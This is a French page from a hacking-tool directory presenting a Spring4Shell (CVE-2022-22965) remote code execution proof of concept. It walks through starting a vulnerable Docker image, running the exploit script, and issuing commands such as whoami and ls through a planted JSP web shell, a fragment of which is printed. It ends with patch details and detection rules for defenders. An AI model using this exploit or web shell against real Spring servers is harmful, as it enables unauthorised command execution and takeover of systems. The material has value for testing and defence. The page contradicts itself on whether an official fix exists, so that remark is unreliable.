Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SpringShell — Spring4Shell - RCE de Spring Core - CVE-2022-22965 | Kitploit
Outils/GitHubGitHub/thegejr/springshell
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubthegejr/springshell

SpringShell

Spring4Shell - RCE de Spring Core - CVE-2022-22965

Voir le dépôt
131821il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Spring Core RCE - CVE-2022-22965

Après Spring Cloud, le 29 mars, une autre vulnérabilité majeure de Spring a éclaté sur Internet : Spring Core RCE

Le 31 mars, Spring a publié de nouvelles versions qui corrigent la vulnérabilité. Voir la section Correctif.

Le 31 mars, un numéro CVE a finalement été attribué à la vulnérabilité avec un score CVSS de 9.8 (CRITIQUE)

Preuve de concept

L'exploit est très facile à utiliser, d'où le score CVSS très élevé de 9.8.

Pour tester la vulnérabilité, vous pouvez procéder comme suit.

Démarrez une image Docker vulnérable de Spring.

root@kitploit:~
docker run -d -p 8082:8080 --name springrce -it vulfocus/spring-core-rce-2022-03-29

Cela lie le Spring vulnérable à l'adresse localhost:8082.

Vérifiez que l'image est correctement démarrée avec curl

root@kitploit:~
curl http://localhost:8082

Une réponse ok doit être renvoyée.

Exploitons maintenant l'image vulnérable !

root@kitploit:~
python3 exp.py --url http://localhost:8082
Télécharger l’outil

Une réponse The vulnerability exists .... doit être renvoyée.

Vous pouvez maintenant exploiter la vulnérabilité avec curl

root@kitploit:~
# Execute command whoami
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=whoami

# Response has been truncated
root

//
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } - ........

# Execute command ls
curl --output - http://localhost:8082/tomcatwar.jsp?pwd=j&cmd=ls

# Response has been truncated
app
bin
dev
etc
..........

PoC de codage en circulation

L'exploit a été téléchargé jusqu'à présent exp.py
PoC de codage en circulation
situation délicate

Correctif

Spring a maintenant publié de nouvelles versions qui corrigent cette CVE. Voir l'annonce de Spring.

Le commit qui a corrigé la vulnérabilité

Impact de la vulnérabilité

  1. Version JDK 9 et supérieure
  2. Utilisation de Spring Framework ou de frameworks dérivés

Suggestion de correction

À l'heure actuelle, Spring n'a pas encore publié officiellement de correctif, il est recommandé de réduire la version du JDK comme solution temporaire

Équipe bleue

Yara

  • Florian Roth - Webshells Spring4Shell

Sigma

  • Emanuele De Lucia - Création de webshells .jsp

SPLUNK

  • Alex John - Détection Splunk SPL